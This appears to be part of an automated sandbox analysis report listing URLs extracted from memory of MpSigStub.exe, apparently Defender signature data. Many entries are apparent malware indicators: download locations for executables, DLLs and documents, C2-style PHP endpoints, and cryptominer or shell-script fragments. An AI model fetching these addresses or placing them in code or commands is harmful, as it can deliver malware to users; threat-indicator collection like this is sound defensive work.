Source: MpSigStub.exe, 00000023.00000003.6270225099.0000028BD77EA000.00000004.00000001.sdmp	String found in binary or memory: http://178.79.137.25/campo/
Source: MpSigStub.exe, 00000023.00000003.6280803860.0000028BD7E31000.00000004.00000001.sdmp	String found in binary or memory: http://179.43.158.187/PhtJFr0fvBk2.php
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: http://18.130.111.206/wp/x_y/
Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp	String found in binary or memory: http://181.174.166.137/sys/f4.exe
Source: MpSigStub.exe, 00000023.00000003.6308515408.0000028BD71BB000.00000004.00000001.sdmp	String found in binary or memory: http://184.105.163.238/
Source: MpSigStub.exe, 00000023.00000003.6290474663.0000028BD5FE4000.00000004.00000001.sdmp	String found in binary or memory: http://185.14.30.131/api.php
Source: MpSigStub.exe, 00000023.00000003.6264075284.0000028BD8107000.00000004.00000001.sdmp	String found in binary or memory: http://185.14.31.93/nuzq5lag7htb.php
Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	String found in binary or memory: http://185.141.25.168/check_attack/
Source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.6276951583.0000028BD782D000.00000004.00000001.sdmp	String found in binary or memory: http://185.153.198.216:8010/UserService
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://185.165.29.36/11.mov
Source: MpSigStub.exe, 00000023.00000003.6266211680.0000028BD6B88000.00000004.00000001.sdmp	String found in binary or memory: http://185.165.30.31
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	String found in binary or memory: http://185.172.110.217/kvsn/image.png
Source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp	String found in binary or memory: http://185.172.110.217/robx/remit.jpg
Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmp	String found in binary or memory: http://185.180.197.66/2vjdz6jaqzeiq.php
Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	String found in binary or memory: http://185.183.98.14/fontsupdate.php
Source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmp	String found in binary or memory: http://185.22.153.9/desktop-u2u8a6r/nature/
Source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmp	String found in binary or memory: http://185.22.153.9/desktop-u2u8a6r/nature/prey.dot
Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmp	String found in binary or memory: http://185.225.19.240/dmenconsvc.dll
Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmp	String found in binary or memory: http://185.236.231.209/xcel/copy/xel.phpmethod=post
Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmp	String found in binary or memory: http://185.236.231.210/test/en/dsf.php
Source: MpSigStub.exe, 00000023.00000003.6328027500.0000028BD6832000.00000004.00000001.sdmp	String found in binary or memory: http://185.243.215.213/sys_info.vbs
Source: MpSigStub.exe, 00000023.00000003.6311571113.0000028BD79D4000.00000004.00000001.sdmp	String found in binary or memory: http://185.250.149.128/
Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp	String found in binary or memory: http://185.26.113.95:8095/batpower2.txt
Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	String found in binary or memory: http://185.38.142.91/awo/
Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	String found in binary or memory: http://185.38.142.91/awo/next.php
Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmp	String found in binary or memory: http://185.82.218.2/
Source: MpSigStub.exe, 00000023.00000003.6290474663.0000028BD5FE4000.00000004.00000001.sdmp	String found in binary or memory: http://185.82.218.30/44313
Source: MpSigStub.exe, 00000023.00000003.6264075284.0000028BD8107000.00000004.00000001.sdmp	String found in binary or memory: http://185.99.2.83/frte1z0xiwu8q.php
Source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmp	String found in binary or memory: http://187.157.146.147/m0rpheus/index.php?mon=
Source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmp	String found in binary or memory: http://188.127.254.159/
Source: MpSigStub.exe, 00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmp	String found in binary or memory: http://188.166.41.131/momo.php
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	String found in binary or memory: http://189.1.168.10/~festaefe/1024bit.php
Source: MpSigStub.exe, 00000023.00000003.6315036458.0000028BD60E4000.00000004.00000001.sdmp	String found in binary or memory: http://190.14.37.190/
Source: MpSigStub.exe, 00000023.00000003.6295487239.0000028BD661C000.00000004.00000001.sdmp	String found in binary or memory: http://190.14.37.191/
Source: MpSigStub.exe, 00000023.00000003.6317125613.0000028BD6C91000.00000004.00000001.sdmp	String found in binary or memory: http://192.168.0.108/download.ps1
Source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmp	String found in binary or memory: http://192.168.1.60/6464.exe
Source: MpSigStub.exe, 00000023.00000003.6295487239.0000028BD661C000.00000004.00000001.sdmp	String found in binary or memory: http://192.168.100.5/00ButtonTest.exe
Source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmp	String found in binary or memory: http://192.168.213.131/logo.doc
Source: MpSigStub.exe, 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmp	String found in binary or memory: http://192.168.88.
Source: MpSigStub.exe, 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmp	String found in binary or memory: http://192.189.25.17/cgbin/ukbros
Source: MpSigStub.exe, 00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmp	String found in binary or memory: http://192.227.228.85/.--...........................................................................
Source: MpSigStub.exe, 00000023.00000003.6339082124.0000028BD7EB5000.00000004.00000001.sdmp	String found in binary or memory: http://192.3.141.134/document_m.doc
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	String found in binary or memory: http://192.3.141.173/word/
Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp	String found in binary or memory: http://192.3.152.134/nda/document.doc
Source: MpSigStub.exe, 00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmp	String found in binary or memory: http://192.3.22.5/.-................................................................................
Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	String found in binary or memory: http://192.3.31.211/index.php?macos=
Source: MpSigStub.exe, 00000023.00000003.6432193313.0000028BD6D97000.00000004.00000001.sdmp	String found in binary or memory: http://192.99.214.32/word1.tmp
Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	String found in binary or memory: http://193.107.19.250:89/users/gigi_eli/ax.php
Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmp	String found in binary or memory: http://193.203.202.55/
Source: MpSigStub.exe, 00000023.00000003.6290474663.0000028BD5FE4000.00000004.00000001.sdmp	String found in binary or memory: http://193.38.55.92/gfmppbpq
Source: MpSigStub.exe, 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: http://194.145.227.21sys=$(date
Source: MpSigStub.exe, 00000023.00000003.6339668679.0000028BD61EC000.00000004.00000001.sdmp	String found in binary or memory: http://194.178.112.202
Source: MpSigStub.exe, 00000023.00000003.6290474663.0000028BD5FE4000.00000004.00000001.sdmp	String found in binary or memory: http://194.5.249.101/api.php
Source: MpSigStub.exe, 00000023.00000003.6311413449.0000028BD79B9000.00000004.00000001.sdmp	String found in binary or memory: http://194.5.249.107/2nquxqz2ok4a45l.php
Source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmp	String found in binary or memory: http://195.123.210.174/
Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	String found in binary or memory: http://195.123.219.21/campo/t3/t3d
Source: MpSigStub.exe, 00000023.00000003.6299498937.0000028BD6FED000.00000004.00000001.sdmp	String found in binary or memory: http://195.123.220.249/campo/t2/t2dcdddebp%&c
Source: MpSigStub.exe, 00000023.00000003.6345763717.0000028BD65BB000.00000004.00000001.sdmp	String found in binary or memory: http://195.123.235.1/
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	String found in binary or memory: http://195.225.176.34/ad/
Source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmp	String found in binary or memory: http://195.226.220.112/~admin/.
Source: MpSigStub.exe, 00000023.00000003.6288865020.0000028BD7BC8000.00000004.00000001.sdmp	String found in binary or memory: http://195.78.108.
Source: MpSigStub.exe, 00000023.00000003.6286543485.0000028BD62AA000.00000004.00000001.sdmp	String found in binary or memory: http://195.95.218.173/dl/dl.php?
Source: MpSigStub.exe, 00000023.00000003.6286543485.0000028BD62AA000.00000004.00000001.sdmp	String found in binary or memory: http://195.95.218.173/troys/
Source: MpSigStub.exe, 00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmp	String found in binary or memory: http://198.12.127.217/.--------------------------.--------------........-...................-/_.....
Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp	String found in binary or memory: http://198.23.212.187/_......................................_......................-/
Source: MpSigStub.exe, 00000023.00000003.6300664525.0000028BD7A3C000.00000004.00000001.sdmp	String found in binary or memory: http://198.23.213.25/document.doc
Source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmp	String found in binary or memory: http://198.23.251.121/_--_-_---_-_--__------_.......................................................
Source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp	String found in binary or memory: http://198.46.132.163/
Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp	String found in binary or memory: http://198.46.132.185/.--_------------------------------------------.-----/
Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmp	String found in binary or memory: http://198.46.201.115/.-...................................................-.-/..-------------------
Source: MpSigStub.exe, 00000023.00000003.6270596186.0000028BD6DDB000.00000004.00000001.sdmp	String found in binary or memory: http://198.50.114.16
Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp	String found in binary or memory: http://1animalsnames.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6280069144.0000028BD7AC1000.00000004.00000001.sdmp	String found in binary or memory: http://1bestgate.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmp	String found in binary or memory: http://1lxtjdias-pod:8080/stage3.exe
Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: http://200.159.128.
Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp	String found in binary or memory: http://200.63.45.105/duiss/duiss
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: http://200.74.240.151/saturno/w7.txt
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: http://200.74.240.151/saturno/w8.txt
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: http://200.98.
Source: MpSigStub.exe, 00000023.00000003.6439529819.0000028BD66E5000.00000004.00000001.sdmp	String found in binary or memory: http://200.98.142.117/sys02/01.exe
Source: MpSigStub.exe, 00000023.00000003.6280069144.0000028BD7AC1000.00000004.00000001.sdmp	String found in binary or memory: http://2010-kpss.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6312196496.0000028BD70F5000.00000004.00000001.sdmp	String found in binary or memory: http://2012-wallpaper-hd.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6319059958.0000028BD62F3000.00000004.00000001.sdmp	String found in binary or memory: http://2014secimleriturkiye.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6266211680.0000028BD6B88000.00000004.00000001.sdmp	String found in binary or memory: http://202.104.11.94
Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: http://203.199.200.61
Source: MpSigStub.exe, 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp	String found in binary or memory: http://205.177.124.74/
Source: MpSigStub.exe, 00000023.00000003.6319059958.0000028BD62F3000.00000004.00000001.sdmp	String found in binary or memory: http://205.185.116.78/
Source: MpSigStub.exe, 00000023.00000003.6283686217.0000028BD64B3000.00000004.00000001.sdmp	String found in binary or memory: http://205.185.122.246/FQL66n
Source: MpSigStub.exe, 00000023.00000003.6307889726.0000028BD7137000.00000004.00000001.sdmp	String found in binary or memory: http://205.185.122.246/b9xbb3
Source: MpSigStub.exe, 00000023.00000003.6283686217.0000028BD64B3000.00000004.00000001.sdmp	String found in binary or memory: http://205.185.122.246/files/may13.bin
Source: MpSigStub.exe, 00000023.00000003.6283686217.0000028BD64B3000.00000004.00000001.sdmp	String found in binary or memory: http://205.185.122.246/khkwZF
Source: MpSigStub.exe, 00000023.00000003.6307889726.0000028BD7137000.00000004.00000001.sdmp	String found in binary or memory: http://205.185.125.104/1t1nnx
Source: MpSigStub.exe, 00000023.00000003.6282961298.0000028BD6AC6000.00000004.00000001.sdmp	String found in binary or memory: http://205.185.125.104/pqbtwj
Source: MpSigStub.exe, 00000023.00000003.6282961298.0000028BD6AC6000.00000004.00000001.sdmp	String found in binary or memory: http://205.185.125.104/yxsz8k
Source: MpSigStub.exe, 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp	String found in binary or memory: http://205.252.24.246/
Source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmp	String found in binary or memory: http://207.154.225.82/report.json?type=mail&u=$muser&c=
Source: MpSigStub.exe, 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp	String found in binary or memory: http://207.226.171.35/
Source: MpSigStub.exe, 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp	String found in binary or memory: http://207.226.171.36/
Source: MpSigStub.exe, 00000023.00000003.6340606272.0000028BD78F3000.00000004.00000001.sdmp	String found in binary or memory: http://207.226.177.108/sc.exe
Source: MpSigStub.exe, 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: http://207.58.162.237/spy/cartao.scr
Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp	String found in binary or memory: http://208.115.201.245/ideal.zip
Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: http://208.95.104.
Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp	String found in binary or memory: http://209.141.35.239/33/
Source: MpSigStub.exe, 00000023.00000003.6341569052.0000028BD6C4E000.00000004.00000001.sdmp	String found in binary or memory: http://209.141.61.124/Q-2/
Source: MpSigStub.exe, 00000023.00000003.6338116203.0000028BD7305000.00000004.00000001.sdmp	String found in binary or memory: http://209.141.61.124/q-2/dy5434app14.exe
Source: MpSigStub.exe, 00000023.00000003.6327210965.0000028BD7C8F000.00000004.00000001.sdmp	String found in binary or memory: http://209.141.61.124/q-2/img_0107803.exe
Source: MpSigStub.exe, 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp	String found in binary or memory: http://209.62.108.213/
Source: MpSigStub.exe, 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp	String found in binary or memory: http://209.62.108.220/
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	String found in binary or memory: http://20vp.cn/moyu/
Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	String found in binary or memory: http://210302.top/
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	String found in binary or memory: http://212.129.31.67
Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp	String found in binary or memory: http://212.192.241.203/xx/kl.exe
Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp	String found in binary or memory: http://212.192.241.203/xx/kl.exex
Source: MpSigStub.exe, 00000023.00000003.6341254844.0000028BD7D97000.00000004.00000001.sdmp	String found in binary or memory: http://212.237.58.208/0607/
Source: MpSigStub.exe, 00000023.00000003.6289461513.0000028BD744F000.00000004.00000001.sdmp	String found in binary or memory: http://212.86.115.71/template.doc
Source: MpSigStub.exe, 00000023.00000003.6319962733.0000028BD6878000.00000004.00000001.sdmp	String found in binary or memory: http://213.159.117.134/index.php
Source: MpSigStub.exe, 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmp	String found in binary or memory: http://213.159.213.195/d.exe
Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp	String found in binary or memory: http://216.170.114.73/
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://216.172.154.248/pic/img.js
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://216.172.172.40/~agora546/cardoso/dilma.zip
Source: MpSigStub.exe, 00000023.00000003.6279385939.0000028BD6BD6000.00000004.00000001.sdmp	String found in binary or memory: http://216.93.188.81/
Source: MpSigStub.exe, 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp	String found in binary or memory: http://217.73.6
Source: MpSigStub.exe, 00000023.00000003.6303687995.0000028BD6EE5000.00000004.00000001.sdmp	String found in binary or memory: http://217.8.117
Source: MpSigStub.exe, 00000023.00000003.6283686217.0000028BD64B3000.00000004.00000001.sdmp	String found in binary or memory: http://217.8.117.60/arty.exe
Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	String found in binary or memory: http://217.8.117.63/
Source: MpSigStub.exe, 00000023.00000003.6346082988.0000028BD6579000.00000004.00000001.sdmp	String found in binary or memory: http://218.204.253.145/setup.exe
Source: MpSigStub.exe, 00000023.00000003.6277372616.0000028BD786E000.00000004.00000001.sdmp	String found in binary or memory: http://220.73.162.2/Download
Source: MpSigStub.exe, 00000023.00000003.6277372616.0000028BD786E000.00000004.00000001.sdmp	String found in binary or memory: http://220.73.162.4/Download
Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp	String found in binary or memory: http://22112017.flashplayeron.com
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: http://22y456.com/
Source: MpSigStub.exe, 00000023.00000003.6339668679.0000028BD61EC000.00000004.00000001.sdmp	String found in binary or memory: http://23.244.141.185/cgi-bin
Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp	String found in binary or memory: http://23.249.163.163/qwerty.exe
Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp	String found in binary or memory: http://23.95.122.24/..-.-.-.-.-.-.-.-.-.-.-._---------_-------_-------....-.-/
Source: MpSigStub.exe, 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmp	String found in binary or memory: http://23.95.122.25/..-.-................-.....-------------/
Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp	String found in binary or memory: http://23.95.122.25/..-.-................-.....-------------/.......................................
Source: MpSigStub.exe, 00000023.00000003.6274482455.0000028BD75C0000.00000004.00000001.sdmp	String found in binary or memory: http://23.95.122.31/concord/
Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmp	String found in binary or memory: http://23.95.231.200/images/footer1.dll
Source: MpSigStub.exe, 00000023.00000003.6264485610.0000028BD7D13000.00000004.00000001.sdmp	String found in binary or memory: http://24-7-search.com/
Source: MpSigStub.exe, 00000023.00000003.6432193313.0000028BD6D97000.00000004.00000001.sdmp	String found in binary or memory: http://27.102.66.105/test.msi
Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp	String found in binary or memory: http://27.192.62.107
Source: MpSigStub.exe, 00000023.00000003.6266211680.0000028BD6B88000.00000004.00000001.sdmp	String found in binary or memory: http://2fa.com-token-auth.com/
Source: MpSigStub.exe, 00000023.00000003.6346082988.0000028BD6579000.00000004.00000001.sdmp	String found in binary or memory: http://2ndrequest.me/
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://2p8s.fellatiomovefilehost.net/movie.php?id=movies_n01.wmv&cid=
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://2p8s.fellatiomovefilehost.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000023.00000003.6320105225.0000028BD6890000.00000004.00000001.sdmp	String found in binary or memory: http://2udating.com
Source: MpSigStub.exe, 00000023.00000003.6320105225.0000028BD6890000.00000004.00000001.sdmp	String found in binary or memory: http://2udating.net
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: http://3.0.242.71/wp-content/2_ur/
Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp	String found in binary or memory: http://3/upload/all/Decrypter.exe
Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: http://31.192.209.
Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: http://31.192.210.
Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: http://31.192.211.
Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp	String found in binary or memory: http://31.210.20.225:8080/server.exe")
Source: MpSigStub.exe, 00000023.00000003.6311571113.0000028BD79D4000.00000004.00000001.sdmp	String found in binary or memory: http://3117488091/lib/jquery-3.2.1.min.js
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: http://3286924353/jb.jar
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: http://32player.com
Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	String found in binary or memory: http://3389.space/
Source: MpSigStub.exe, 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmp	String found in binary or memory: http://365well.org/zload/get_exe.php?l=
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: http://37.10.71.35/scan001-jpeg.jar
Source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp	String found in binary or memory: http://37.120.206.70/dom/d.wbk
Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp	String found in binary or memory: http://37.120.206.70/mend/
Source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp	String found in binary or memory: http://37.120.206.70/mend/m.wbk
Source: MpSigStub.exe, 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmp	String found in binary or memory: http://37.187.248.215/promo.php
Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp	String found in binary or memory: http://3b3.org/
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: http://3dcpw.net/house/404.htm
Source: MpSigStub.exe, 00000023.00000003.6280069144.0000028BD7AC1000.00000004.00000001.sdmp	String found in binary or memory: http://3dplayful.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6282378484.0000028BD702F000.00000004.00000001.sdmp	String found in binary or memory: http://3gool.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmp	String found in binary or memory: http://3novices.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmp	String found in binary or memory: http://3rbfilm.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	String found in binary or memory: http://3s249.s249327.96.lt/mss2ro37qtl3cbw9vo0lk2bx8vv7jmx2mlesim9ddw11fem3sjp3ijuoufk/mss.php
Source: MpSigStub.exe, 00000023.00000003.6341569052.0000028BD6C4E000.00000004.00000001.sdmp	String found in binary or memory: http://3z.fi/evil1/PMwGWkmh
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: http://41.59.0.100/intranet
Source: MpSigStub.exe, 00000023.00000003.6311413449.0000028BD79B9000.00000004.00000001.sdmp	String found in binary or memory: http://45.12.32.58/
Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmp	String found in binary or memory: http://45.12.32.87/
Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmp	String found in binary or memory: http://45.12.32.9/
Source: MpSigStub.exe, 00000023.00000003.6290474663.0000028BD5FE4000.00000004.00000001.sdmp	String found in binary or memory: http://45.138.157.216/44313
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: http://45.138.172.158
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: http://45.139.236.86/scan.wbk?raw=true
Source: MpSigStub.exe, 00000023.00000003.6295487239.0000028BD661C000.00000004.00000001.sdmp	String found in binary or memory: http://45.144.30.16/
Source: MpSigStub.exe, 00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmp	String found in binary or memory: http://45.145.185.85xmr=network001sys=sysrv002#killoldfilespkill-9
Source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmp	String found in binary or memory: http://45.150.67.233/
Source: MpSigStub.exe, 00000023.00000003.6301785848.0000028BD7C0A000.00000004.00000001.sdmp	String found in binary or memory: http://45.55.29.117/download/nsis/pb_nsissetup.exe
Source: MpSigStub.exe, 00000023.00000003.6315036458.0000028BD60E4000.00000004.00000001.sdmp	String found in binary or memory: http://45.63.107.19/PhilaeAp05.cpl
Source: MpSigStub.exe, 00000023.00000003.6345763717.0000028BD65BB000.00000004.00000001.sdmp	String found in binary or memory: http://45.67.230.159/
Source: MpSigStub.exe, 00000023.00000003.6311413449.0000028BD79B9000.00000004.00000001.sdmp	String found in binary or memory: http://45.77.255.68/5.sctscrobj.dll
Source: MpSigStub.exe, 00000023.00000003.6432193313.0000028BD6D97000.00000004.00000001.sdmp	String found in binary or memory: http://45.78.21.150/boost/boosting.exe
Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	String found in binary or memory: http://45.84.1.195/
Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp	String found in binary or memory: http://45.89.127.230/images/yellowtank.png-o%appdata%
Source: MpSigStub.exe, 00000023.00000003.6317125613.0000028BD6C91000.00000004.00000001.sdmp	String found in binary or memory: http://45.9.148.35/chimaera/bin/rpm_deb_apk/x86_64/openssh.rpm
Source: MpSigStub.exe, 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmp	String found in binary or memory: http://45.9.148.35/chimaera/sh/
Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	String found in binary or memory: http://45.90.59.77/
Source: MpSigStub.exe, 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp	String found in binary or memory: http://45.90.59.97/44313
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: http://46.101.202.232/wp-includes/mx_ib/
Source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmp	String found in binary or memory: http://46.183.220.123/wxx.doc
Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp	String found in binary or memory: http://46.243.136.238/
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: http://46.30.43.8/gw.exe
